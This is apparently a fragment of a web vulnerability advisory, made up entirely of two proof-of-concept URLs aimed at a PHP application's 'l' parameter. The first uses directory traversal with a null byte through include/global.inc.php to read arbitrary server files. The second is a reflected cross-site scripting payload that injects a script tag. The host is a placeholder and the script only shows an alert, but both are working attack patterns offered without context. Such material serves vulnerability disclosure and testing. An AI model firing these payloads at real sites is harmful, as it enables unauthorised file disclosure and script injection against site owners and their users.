http://www.example.com/include/global.inc.php?l=../../../[FILE NAME]%00 http://www.example.com/?l=" <script>alert('xss')</script>